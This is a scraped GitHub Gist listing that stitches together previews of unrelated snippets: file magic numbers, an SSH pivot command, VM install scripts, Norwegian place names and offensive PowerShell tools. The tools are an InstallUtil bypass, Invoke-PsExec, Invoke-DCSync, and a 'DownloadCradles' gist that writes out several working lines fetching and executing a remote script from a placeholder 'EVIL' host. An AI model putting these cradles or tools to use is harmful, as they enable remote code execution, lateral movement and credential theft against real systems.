@leommoore
leommoore / file_magic_numbers.md
Last active November 6, 2025 17:21
File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a JPEG file starts with:

ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G

ffd8 shows that it's a JPEG file, and ffe0 identifies a JFIF type structure. There is an ASCII encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

Command to run:
ssh -L 2222:localhost:8501 [email protected]
where 2222 is the local port mapping it can be any number above 1000
where localhost must be set to localhost and refers to your current connection
where 8501 is the port you will be opening up on the remote machine
where [email protected] is the first hop in your quest for internal access
@Phaeilo
Phaeilo / archvm.sh
Last active May 24, 2022 19:55
Archlinux VM automated installation script.
#!/bin/bash
# The MIT License (MIT)
#
# Copyright (c) 2015 Philip Huppert
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
@JonTheNiceGuy
JonTheNiceGuy / COMBINED TESTING
Created July 8, 2015 09:46
MS Access VBA to perform AES encryption, Base 64 encoding and create SHA1 hashes
Sub test()
Dim SourceString As String
Dim InterimString As String
Dim DestinationString As String
SourceString = ""
InterimString = ""
DestinationString = ""
Do Until Len(SourceString) > 220
@Meatballs1
Meatballs1 / InstallUtil-PowerShell.cs
Last active October 13, 2023 14:47
InstallUtil.exe PowerShell
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
@HarmJ0y
HarmJ0y / Invoke-Psexec.ps1
Last active September 12, 2022 02:41
Invoke-Psexec
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the
@eiriks
eiriks / fylker.json
Last active May 31, 2019 23:30
Norwegian Names (collected from different places, most from this project: https://github.com/eiriks/navn-til-kj-nn )
["Østfold","Akershus","Oslo","Hedmark","Oppland","Buskerud","Vestfold","Telemark","Aust-Agder","Vest-Agder","Rogaland","Hordaland","Sogn og Fjordane","Møre og Romsdal","Sør-Trøndelag","Nord-Trøndelag","Trøndelag","Nordland","Troms","Finnmark","Svalbard","Jan Mayen","Kontinentalsokkelen"]
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active October 31, 2025 18:13
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@eldondev
eldondev / cmd
Last active December 4, 2023 16:33
Because everyone needs a good preseed
wget -nc http://ftp.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/linux
wget -nc http://ftp.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/initrd.gz
cp -nv ~/.ssh/id_rsa.pub .
qemu-system-x86_64 -machine accel=kvm -kernel linux -initrd initrd.gz -m 1G -smp 2 -append "blacklist=vga16fb fb=false video=false vga=normal auto=true url=http://10.0.2.10:8080/debian-preseed.txt hostname=otto domain=" -net user,guestfwd=:10.0.2.10:8080-cmd:"/bin/busybox httpd -i" -hda /dev/shm/deb.img -net nic -display none
@monoxgas
monoxgas / Invoke-DCSync.ps1
Last active December 2, 2024 08:46
What more could you want?
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y